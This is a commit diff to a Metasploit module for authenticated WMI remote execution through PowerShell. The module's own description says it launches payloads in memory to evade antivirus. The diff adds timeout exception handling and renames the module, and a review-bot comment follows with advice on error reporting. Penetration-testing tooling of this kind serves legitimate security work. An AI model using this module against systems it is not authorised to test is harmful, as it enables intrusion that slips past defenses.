Title change and handling Rex::TimeoutError exception

bug/bundler_fix
wchen-r7 2016-11-16 16:23:44 -06:00
parent 7b83720b90
commit e1ff37f3eb
1 changed files with 17 additions and 11 deletions


@ -1,20 +1,15 @@
# -*- coding: binary -*-
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
##
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
##
require 'msf/core' require 'msf/core'
require 'msf/core/post/windows/powershell' require 'msf/core/post/windows/powershell'
require 'msf/core/post/windows/priv' require 'msf/core/post/windows/priv'
require 'msf/core/exploit/powershell/dot_net'
class Metasploit3 < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Post::Windows::Powershell include Msf::Post::Windows::Powershell
@ -23,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Authenticated WMI Exec via Powershell (Local Exploit)", 'Name' => "Authenticated WMI Exec via Powershell",
'Description' => %q{ 'Description' => %q{
This module uses WMI execution to launch a payload instance on a remote machine. This module uses WMI execution to launch a payload instance on a remote machine.
In order to avoid AV detection, all execution is performed in memory via psh-net In order to avoid AV detection, all execution is performed in memory via psh-net
@ -117,7 +112,6 @@ class Metasploit3 < Msf::Exploit::Local
end end
def exploit def exploit
# Make sure we meet the requirements before running the script # Make sure we meet the requirements before running the script
unless have_powershell? unless have_powershell?
fail_with(Failure::BadConfig, 'PowerShell not found') fail_with(Failure::BadConfig, 'PowerShell not found')
@ -137,7 +131,13 @@ class Metasploit3 < Msf::Exploit::Local
return return
end end
print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}") begin
psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
print_good(psh_output)
rescue Rex::TimeoutError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
vprint_good('PSH WMI exec is complete.') vprint_good('PSH WMI exec is complete.')
end end
@ -176,7 +176,13 @@ EOS
EOS EOS
return ps_wrapper return ps_wrapper
end end
end end
#
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
#
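Review bot: In `exploit`, the new `rescue Rex::TimeoutError => e` branch only records the failure with `elog`, and control then falls through to `vprint_good('PSH WMI exec is complete.')`, so a run that timed out is reported on the console as a completed one. I would surface the timeout to the operator with `print_error("#{e.class}: #{e.message}")` in the rescue, and move the `vprint_good` line inside the `begin`, directly after `print_good(psh_output)`, so it prints only on success. The old code interpolated the result into a string, which turned a `nil` into an empty string, whereas `print_good(psh_output)` now passes the value through unchanged. The return value of `psh_exec` is not visible here, so it is worth confirming it is always a String. The body of `exploit` spans several hunks and is only partly shown, so this is based on the visible lines.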